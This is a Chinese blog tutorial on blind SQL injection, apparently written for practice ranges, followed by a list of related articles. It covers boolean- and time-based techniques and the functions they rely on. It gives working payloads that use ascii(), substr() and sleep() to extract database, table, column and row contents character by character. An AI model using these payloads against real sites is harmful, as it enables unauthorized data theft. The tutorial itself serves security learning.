SQL盲注原理分析(超详细)(网络安全)

最新推荐文章于 2024-06-26 10:53:50 发布
最新推荐文章于 2024-06-26 10:53:50 发布
阅读量318 收藏 9
点赞数 4
文章标签: sql 学习 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoyang886_/article/details/137333668
版权

一、盲注介绍

盲注就是在SQL注入过程中,SQL语句执行select之后,可能由于网站代码的限制或者Apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。

通俗的讲就是在前端页面没有显示位,不能返回SQL语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行SQL注入。

盲注的分类:

布尔盲注

没有返回SQL执行的错误信息,错误与正确的输入,返回的结果只有两种

时间盲注

页面上没有显示位和SQL语句执行的错误信息,正确执行和错误执行的返回界面一样

前提条件:

首先页面没有显示位(如果有显示位可以选择union联合查询),并且没有返回sql语句的执行错误信息

二、盲注函数介绍

Length()             返回字符串的长度

Substr()              截取字符串(substr(str,pos,len))Left()        截取字符串( left (string,n) )

Ascii()      返回字符的Ascii码

Sleep()            将程序挂起x秒

if(expr1,expr2,expr3)          判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句

三、盲注靶场的做法

拆解数据库名称长度:

id=1' and (length(database()))>2#

利用ASCII码猜解当前数据库名称: and (ascii(substr(database(),1,1)))=98--+ 返回正常,说明数据库名称第一位是b

and (ascii(substr(database(),2,1)))=118--+ 返回正常,说明数据库名称第二位是v

猜表名:

and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=97--+ 返回正常,说明数据库表名的第一个的第一位是a

猜字段名:

and (ascii(substr((select column_name from information_schema.columns where table_name=‘user' limit 0,1),1,1)))=117--+ 返回正常,说明zkaq表中的列名称第一位是u

猜内容:

and (ascii(substr(( select name from name limit 1,1),1,1)))=114--+返回正常,说明name列第一位是z

四、延时注入靶场做法

if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句  

and if(ascii(substr(database(),1,1))>120,0,sleep(10)) --+

Sqli-libs靶场大通关!

 

 

muzi1in
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
实验15:sql盲注原理及基于boolean的盲注
qq_44720671的博客
04-07 545
sql盲注原理及基于boolean的盲注 盲注: 有时,后台用错误消息屏蔽方法屏蔽报错,无法根据报错信息来判断注入,这种情况的注入叫做盲注盲注分为based boolean(基于真假)和based time(基于时间) 两种 本章我们学习的是基于真假的盲注——based boolean 特征: 1、无报错信息 2、无论对错只有两种情况(如:0或1) 3、正确时输入and 1=1或and 1=2...
SQL盲注利用工具
11-15
SQL盲注SQL Blind Injection)是一种常见的网络安全漏洞,攻击者通过发送特定的SQL查询到应用程序,根据应用程序对异常情况的响应来推断数据库中的信息。在这种情况下,我们讨论的是一款名为"BSQLInjector"的工具...
SQL盲注(原理概述、分类)
热门推荐
小赵同学的博客
12-29 2万+
盲注原理 盲注的分类 盲注常用函数 盲注的利用方法 一、SQL盲注概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。 2.盲注是不能通过直接显示的途径来获取数据库数据的方法。 盲注可以分为三类: 布尔盲注 时间盲注 报错型盲注 1、布尔盲注 盲注查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
SQL盲注技术分享及dvwa靶场通关
最新发布
2301_79410179的博客
06-26 753
SQL注入是一种网络攻击技术,它利用Web应用程序对用户输入数据的合法性验证不足或过滤不严的漏洞,攻击者可以在应用程序中预定义的查询语句的结尾上添加恶意的SQL代码片段,从而欺骗数据库服务器执行非授权的任意查询,进一步获取数据库中的敏感信息或执行恶意操作。这里将布尔盲注又细分出了一个新的类型——报错盲注,这个报错盲注和我们通常说的报错注入是完全不同的东西,它的特点在于,当攻击者尝试注入SQL代码时,由于数据库查询的错误,错误信息会被返回给攻击者,进而泄露了数据库的结构或内容。
SQl盲注原理及其简单演示
weixin_64066158的博客
05-02 2245
首先说下Sql盲注Sql注入的区别: 盲注:获得不了过多的信息,没有详细内容; 普通注入:可以通过较为详细的内容来分析盲注概述:在sql注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,我们需要使用一些特殊的方式来判断或者尝试,这个过程称为盲注盲注一般分为三种: 布尔盲注:页面只返回对或者错,存在或者不存在来判断 基于时间的盲注:通过页面沉睡时间来判断 报错的盲注:输入特定的语句使页面报错,网页回输出相关的错误信息;从而是我们想要的基本信息; 今天主要讲布尔盲注
SQL Injection (Blind)之盲注原理、分类、利用)
m0_59598029的博客
04-20 942
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间的盲注(Time based)
sql盲注拦截器配置文件
11-20
SQL盲注SQL Blind Injection)是一种常见的网络安全威胁,它利用了Web应用程序中对用户输入处理不当的漏洞。当攻击者可以向数据库发送恶意构造的SQL查询,并根据应用程序的响应来推断数据库信息时,就可能发生SQL...
CTF用的各种脚本,各类古典加解密的脚本,RSA常用脚本,SQL盲注脚本,编码加解密神器
12-29
网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,旨在锻炼和测试参赛者的安全技能,特别是关于网络攻防的知识。在这个特定的压缩包文件中,包含了一系列用于CTF比赛的工具和脚本,主要涉及到古典加...
sql盲注.pdf
12-17
本文档“sql盲注.pdf”详细介绍了SQL盲注攻击的技术原理及其实现方法。盲注(Blind SQL Injection)是指攻击者在无法直接观察到数据库返回错误信息或结果的情况下进行的SQL注入攻击。这种类型的攻击更隐蔽,也更难以...
SQL盲注攻击技术综述 1 0
08-04
SQL盲注SQL Injection Blind)是一种针对Web应用程序的网络安全攻击方式,它利用了程序对用户输入数据处理不当的漏洞。这种攻击技术不依赖于错误消息或明显的反馈来确定是否存在SQL注入漏洞,而是通过探测服务器的...
渗透测试技术----常见web漏洞--SQL盲注攻击原理及防御
wwl012345的博客
08-19 3567
一、SQL盲注攻击介绍 1.SQL盲注简介 盲注是在SQL注入攻击过程中,服务器关闭了错误回显,我们单纯通过服务器返回的简单内容的变化来判断服务器是否存在注入。 2.SQL盲注的方法 (boolean-based)boolean型注入:通过页面的返回内容是否正确来验证是否存在着注入 (time-based)时间型注入:通过SQL语句的处理时间的不同来判断是否存在注入,时间型注入可以使用be...
SQL注入---盲注
zhoutong2323的博客
04-05 676
注是一种SQL注入攻击的形式,在这种攻击中,攻击者向目标应用程序发送恶意注入代码,然后通过观察应用程序的响应来推断出数据库中的信息。与常规的SQL注入攻击不同的是,盲注攻击是页面不会将报错信息回显以及没有明显回显位的情况下,页面不直接返回任何有关数据库的具体错误信息,导致攻击者无法直接获得数据库中的数据。盲注可以分为基于布尔逻辑的盲注和基于时间的盲注两种形式。基于布尔逻辑的盲注:攻击者通过在恶意注入代码中利用布尔逻辑运算符(如AND、OR)来判断条件是否为真,从而推断出数据库中的信息。例如,攻击者可以通过尝
【DVWA系列】八、SQL Injection (Blind) SQL注入(盲注)(源码分析&漏洞利用)
Pluto.的博客
03-12 641
文章目录DVWASQL Injection (Blind) SQL注入(盲注)一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别 DVWA SQL Injection (Blind) SQL注入(盲注SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。 一、Low 级别 Low级别的代码对参数id没有做任何检查、过滤 查询 id 查询存在
DVWA-SQL Injection(Blind盲注
Cwillchris的博客
10-28 883
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: SQLInjection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入 攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注盲注分为基于布尔的盲注、基于时间的盲注以及基于报错.
封神台——训练营0基础学渗透测试
sparename的博客
08-06 372
盲注-没有回显情况下SQLSQL盲注——靶场ASQL盲注——靶场A三级目录 SQL盲注——靶场A 1.判断数据库长度:and length(database())>4 12 2 .数据库名称:and substr(database(),1,1)='k ’ ascii(substr(database() ),1,1))>107 用burp进行爆破:开服务器,用本机的私网,注意变量的添加 107 97 110 119 111 108 111 110 103 120 105 97 kanwolongx
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值